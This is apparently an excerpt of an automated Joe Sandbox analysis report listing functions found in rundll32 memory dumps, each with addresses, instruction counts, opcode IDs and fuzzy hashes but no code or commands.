                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 68d75b6c321ae6ecfad5b3b77240aba35793f8f15745a951e8a6da7b3d1809ea
                                                                                                                                                                                                                                                                            • Instruction ID: ea5f596bd40105e8baf2814e5e86eb691c91d255f2c5c7b1dfba31102f4bee4d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d75b6c321ae6ecfad5b3b77240aba35793f8f15745a951e8a6da7b3d1809ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2011E520F493581FFF6823B4186436E2F9ACB86654F05C4AEDC41DB682DD54EC4643D6
                                                                                                                                                                                                                                                                            Function 04AC28F8 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 26b2ca24975763105ffac93b850cedb186b99122a1320ba98814d91e1e856d9b
                                                                                                                                                                                                                                                                            • Instruction ID: 67ae538a91a7e452b03d6556f94b62125a7b779ee6f755132046723e8cc5ea38
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26b2ca24975763105ffac93b850cedb186b99122a1320ba98814d91e1e856d9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9511F6A6D1E3C56FE7139B74ACA12C97F709E1310870A00DBC481CF1A3E964AA0FC766
                                                                                                                                                                                                                                                                            Function 04AC56C2 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 01daa94611544cca2ecad6e3c0bea595a39630e2cb02b40805cb5221a6435517
                                                                                                                                                                                                                                                                            • Instruction ID: 56b58d1d832f55d047b86f6118191c7341937b91095f9602214a6a31b5b1a685
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01daa94611544cca2ecad6e3c0bea595a39630e2cb02b40805cb5221a6435517
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F511E931E00344BFFB2197A9E84459D7FB6EFC5315B04449AE0069B251DF71BC0E8BA1
                                                                                                                                                                                                                                                                            Function 04AC2258 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b3f7ae8e8de9158040e9a3b3df0418fcb3a9cf18a79c1ce6d7a4bb911070b325
                                                                                                                                                                                                                                                                            • Instruction ID: fd71174690a5ea3ec09474d06a02d04972a91ff27f17438d9e3ba27807fa54ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3f7ae8e8de9158040e9a3b3df0418fcb3a9cf18a79c1ce6d7a4bb911070b325
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B211A75E112089FCB54DF69D884A9EBBB5FF8C710F10816AE915AB364DB31A842CB90
                                                                                                                                                                                                                                                                            Function 04ACA219 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f0e0fe2849c9541263894b1a23bf25020801dd6040f6ec6dc7c0a70dfeaf2ad9
                                                                                                                                                                                                                                                                            • Instruction ID: 36f519a6f636a8367fd25ac2c30dbdbe968ee2b46e2325be231386ff4ac436ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0e0fe2849c9541263894b1a23bf25020801dd6040f6ec6dc7c0a70dfeaf2ad9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09112935B402099BDB14CF96C894BEEBBF5EB88710F258059E805BB350CA71ED468FE0
                                                                                                                                                                                                                                                                            Function 04AC3A38 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 90775502be2c4430eb8546c7ef26ae51ac0755b3b21afadfb06de53171951a1a
                                                                                                                                                                                                                                                                            • Instruction ID: 076e2a88dc1cd36c17ca427c8bae263c8e96682f57ca6592a567643ead322830
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90775502be2c4430eb8546c7ef26ae51ac0755b3b21afadfb06de53171951a1a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA114F30F00205AFEB48DF65D850AAEBBB6EF8C314F14802DD809A7391DE75AC56DB90
                                                                                                                                                                                                                                                                            Function 04ACAAE0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8e1451bf77b3c9bd4d29172fe6ecec8b101f314ce7b9a4c77145cd5c91a4b183
                                                                                                                                                                                                                                                                            • Instruction ID: 81161c42872fa831976b0924177eedfb9c5177553c41a1a2484e40cbe733e252
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e1451bf77b3c9bd4d29172fe6ecec8b101f314ce7b9a4c77145cd5c91a4b183
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0521B874E0020DDFDB44EFA4D594AAEBBF2EF88214F504599E415AB354DA30AE41CF91
                                                                                                                                                                                                                                                                            Function 02E9D69F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1449888117.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2e9d000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bb6f562682ecfd4bb4bbbdc0362a4aa3d6694763a3d687d4c16d70a054081591
                                                                                                                                                                                                                                                                            • Instruction ID: 1d8ce71ecac0d6153abfa40617e8d9fb3c3868946bc9d94a2746071f7fdde72b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb6f562682ecfd4bb4bbbdc0362a4aa3d6694763a3d687d4c16d70a054081591
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111E676544280DFCF16DF10D9C4B16BF72FB84328F24C6AAD8494B656C336D456CBA2
                                                                                                                                                                                                                                                                            Function 04AC1378 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a32a9135cdb36003c56f55f83530e414d068ceb7d1f2b31078f5e5c1b701b8d0
                                                                                                                                                                                                                                                                            • Instruction ID: 8384ce7b2ff808d821c06633e22763a3da5414d94234cf4a6bc7b992e6b89a91
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a32a9135cdb36003c56f55f83530e414d068ceb7d1f2b31078f5e5c1b701b8d0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C32104B0D002098FDB20DFAAC484AEEFBB0FF48310F14812ED96967240CB756946CFA5
                                                                                                                                                                                                                                                                            Function 04AC1958 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ad1914c04dd42bc17b0b6fc08e9ce65f8a39e63841c54c34661eb6ef2cd68b26
                                                                                                                                                                                                                                                                            • Instruction ID: 0db824f709e1558dd00c248cbef9c5b54d39d88cf9edac91872765287d080ed1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad1914c04dd42bc17b0b6fc08e9ce65f8a39e63841c54c34661eb6ef2cd68b26
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27112135E00215AFDB08DFA4D459AA9BBB2EF8C310F14801DD90A97385DF79AD46DF90
                                                                                                                                                                                                                                                                            Function 04AC1380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bca8ec55b5d663c3a7860c7b27654efdb3c9aab462f24925fe89c5181d6de2ec
                                                                                                                                                                                                                                                                            • Instruction ID: d24bb96650fe9c4865caa8fa29f83dcab479bc64f86da63827b73ba554d34b06
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bca8ec55b5d663c3a7860c7b27654efdb3c9aab462f24925fe89c5181d6de2ec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE11E3B4D002498FDB20DFAAC481B9EFBF4FB48314F508529D95967240CB756905CFA5
                                                                                                                                                                                                                                                                            Function 04AC1968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3f07da53bed07c5a90ff9122a788c99318c5331553fcc7fc27340574fced287f
                                                                                                                                                                                                                                                                            • Instruction ID: 00093cd9bbf2546c72ce83ada7e68e3c982a51e689e355dffef957059029ad7e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f07da53bed07c5a90ff9122a788c99318c5331553fcc7fc27340574fced287f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D110035A00215AFDB08DF54D454AA97BB6EF9C311F14401DE909A7380DF79AC46DB90
                                                                                                                                                                                                                                                                            Function 04AC46A0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6c8900d0f49415b597ecae67776d2d6a4e95656b540024999851e1d87cf6438a
                                                                                                                                                                                                                                                                            • Instruction ID: 201dba4357f1a381d86020c14bcc19e8613ca9101d8390f818eda7991335f119
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c8900d0f49415b597ecae67776d2d6a4e95656b540024999851e1d87cf6438a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01F235B013049FD710CB5AD45499977E9EF8E31171640DAF546CB326DA71EC028B95
                                                                                                                                                                                                                                                                            Function 04ACB070 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5feb71d7c49db8e708c1b1721cc7f9ecd4ba3b51cdd3c0e8442564fa372cefd1
                                                                                                                                                                                                                                                                            • Instruction ID: a193ac7a14ae4a7388337a49f91720b415f32da19c9f9860ad835000dbc9b2a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5feb71d7c49db8e708c1b1721cc7f9ecd4ba3b51cdd3c0e8442564fa372cefd1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101D635B002018FE714DA65A88166EFFA6EF84240718C27AE41CC7355DA71F80787A0
                                                                                                                                                                                                                                                                            Function 04AC6038 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 014a2d85867c783768ec4b395aa26c24c7e118b90b9c3dfd29f42c3e73903bca
                                                                                                                                                                                                                                                                            • Instruction ID: 98109c50f7436baaa9c8b3153c3d9651c23fa14b4e5ef45b110177b800014741
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 014a2d85867c783768ec4b395aa26c24c7e118b90b9c3dfd29f42c3e73903bca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A0128764187A08FD3268B34E44518A7FF0EF82705704899ED4C68B693D7B0B40FC392
                                                                                                                                                                                                                                                                            Function 04AC1440 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e71758965a2917ab0ec0719ef822a5c48b7af4fc7f4e72580ff79307efbdbe83
                                                                                                                                                                                                                                                                            • Instruction ID: 7406bb8f05909c8ad40837b75eef9551a83186b1b7820eee97c7c82745300564
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e71758965a2917ab0ec0719ef822a5c48b7af4fc7f4e72580ff79307efbdbe83
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B801D470F093055FEB4A5F7865753263FAADFC210170508BECD49CF242E924E80A87D1
                                                                                                                                                                                                                                                                            Function 04ACCB90 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8129a5d3f0819a077ad9a957d300c704d24d69dc88ae0a3102c44cfc4eae1f89
                                                                                                                                                                                                                                                                            • Instruction ID: a760bb0e857dcf06dfe2aae5710ae98414fef2e1a11dc0ddc419c259608262b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8129a5d3f0819a077ad9a957d300c704d24d69dc88ae0a3102c44cfc4eae1f89
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87F090367081154FA7458BADAC84A2FB7EAFBD4A79315013EE509C3350DB61DC028790
                                                                                                                                                                                                                                                                            Function 02E9D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1449888117.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2e9d000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f9a4a22f0772534c873ad0ac2e4014961488fed003ff9a571083fa80e0bdabff
                                                                                                                                                                                                                                                                            • Instruction ID: d1f2fe8e20ce8ed860b2c2044ce953259f09de181a9bd2ac5e9e4d9f01cf643c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a4a22f0772534c873ad0ac2e4014961488fed003ff9a571083fa80e0bdabff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE010C7154E3D09FD7128B258C94B52BFB4DF47228F19C1DBD9888F1A3C2695849C772
                                                                                                                                                                                                                                                                            Function 02E9D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1449888117.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2e9d000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 696f91044b21865a60bc5d21e9484e56ac26ec66d642abaf38ab655bcd9e2bc4
                                                                                                                                                                                                                                                                            • Instruction ID: eb5cefa8ed27314bc7625752bb4286c46ad64637820f76952d6ceaba1ad7a204
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 696f91044b21865a60bc5d21e9484e56ac26ec66d642abaf38ab655bcd9e2bc4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01F2705483149FEB206A21CC84BA6BF89DF41229F08C15BEC484F282C3799846CAB6
                                                                                                                                                                                                                                                                            Function 04AC46C8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fdfa224489955753445a34b31afd18d8e52dd39e26ff40e1d85a58597893a630
                                                                                                                                                                                                                                                                            • Instruction ID: f73cd072c26488b640732a408da485a8563e045e25ad9849cbcf6830942c53df
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdfa224489955753445a34b31afd18d8e52dd39e26ff40e1d85a58597893a630
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD012274E05248AFEB40DBB9E8454DDBFF5EB44316B1040EBE808D7340D634AB0B9B81
                                                                                                                                                                                                                                                                            Function 04ACEA75 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d32d06ebbc10ed467391ff5cb2f1942eeb2f743cc996a2be9877fa276df502ad
                                                                                                                                                                                                                                                                            • Instruction ID: fe1784645bd89d6fd6996d414603723bd17d00a6fa516df8f47cba547861ad4f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d32d06ebbc10ed467391ff5cb2f1942eeb2f743cc996a2be9877fa276df502ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F024327092201F8705126D58909AFBFFAEBCA22036900BBF048CB352CD69DC0287B2
                                                                                                                                                                                                                                                                            Function 04ACCB7F Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7b6d77d985f0f74ca8b844fca6cf83b56149fd18c84d9b25ee04e28b8d99f70b
                                                                                                                                                                                                                                                                            • Instruction ID: 39cbbcd44a2444d493ee4b1ba4de5a210d77933fc6f67ec3bce1f38cc0a858e4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b6d77d985f0f74ca8b844fca6cf83b56149fd18c84d9b25ee04e28b8d99f70b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0B4397491151FE3014F69AC95A6BBBF9EFD5964315016EE408C7362DA20EC079790
                                                                                                                                                                                                                                                                            Function 04ACB928 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bbce08fe0c7e2edbb2efa6cb3b1c11bf78536cd52b62973784f16853094be6f2
                                                                                                                                                                                                                                                                            • Instruction ID: 2c4e147d70265836eca9b03b388984795ff129c5d45b1c0cd9808dfda3f023a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbce08fe0c7e2edbb2efa6cb3b1c11bf78536cd52b62973784f16853094be6f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61F03C71B442014FEBA4DA69E890A7AA7EADFC8265714803DE84DC7755DB72FC0287A0
                                                                                                                                                                                                                                                                            Function 04AC67E2 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
